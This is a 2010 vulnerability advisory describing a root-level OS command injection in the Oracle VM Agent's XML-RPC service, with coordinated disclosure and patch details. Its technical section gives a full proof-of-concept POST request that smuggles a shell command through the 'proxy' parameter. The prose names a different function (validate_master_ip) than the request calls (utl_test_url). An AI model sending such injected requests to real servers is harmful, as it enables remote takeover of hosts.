Oracle Virtual Server Agent Command Injection

1. Advisory Information
   Advisory ID: BONSAI-2010-0109
   Date published: 2010-10-13
   Vendors contacted: Oracle
   Release mode: Coordinated release

2. Vulnerability Information
   Class: Injection
   Remotely Exploitable: Yes
   Locally Exploitable: Yes

3. Software Description
   Oracle VM is server virtualization software which fully supports both
   Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost
   server virtualization that is three times more efficient than existing
   server virtualization products from other vendors. Oracle has also
   announced certification of key Oracle products including Oracle
   Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real
   Application Clusters with Oracle VM.

Oracle VM Manager communicates with Oracle VM Agent to create and manage
guests on an Oracle VM Server. Oracle VM Agent is installed and
configured during the installation of Oracle VM Server.

By default, Oracle VM Agent is executed, with a highly privileged user,
typically root.

4. Vulnerability Description
   Injection flaws, such as SQL, OS, and LDAP injection, occur when
   untrusted data is sent to an interpreter as part of a command or query.
   The attacker’s hostile data can trick the interpreter into executing
   unintended commands or accessing unauthorized data.

5. Vulnerable packages
   We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle
   VM Agent 2.3.

6. Non-vulnerable packages
   Patch set 2.2.1 and above

7. Credits
   This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
   bonsai-sec.com ).

8. Technical Description
   8.1. OS Command Injection
   CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
   Oracle VS Agent is prone to a remote command execution vulnerability
   because the software fails to adequately sanitize user-supplied input.
   Oracle VS Agent exposes through XML-RPC several functions. One of these
   functions is validate_master_ip, which receives four parameters. The
   second parameter "proxy", is vulnerable to command injection, because it
   is not properly sanitized and its content is concatenated in an
   operative system command, executed as a highly privileged user
   (typically root).
   The following POST message can be sent to the VM Agent XML-RPC port. By
   doing this, the ping command is executed as follows:

POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params>
<param>
<value><string>http://192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.103'; ping –c 10 localhost; '</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
</params>
</methodCall>

9. Report Timeline
   • 2010-09-24 / Bonsai provides vulnerability information to ORACLE
   • 2010-09-29 / Oracle confirms the vulnerability
   • 2010-10-12 / Oracle published Critical Patch Update Fix
   • 2010-10-13 / Public Disclosure

10. About Bonsai
    Bonsai is a company involved in providing professional computer
    information security services. Currently a sound growth company, since
    its foundation in early 2009 in Buenos Aires, Argentina, we are fully
    committed to quality service, and focused on our customers real needs.

11. Disclaimer
    The contents of this advisory are copyright (c) 2010 Bonsai Information
    Security, and may be distributed freely provided that no fee is charged
    for this distribution and proper credit is given.

12. Research
    http://www.bonsai-sec.com/en/research/vulnerability.php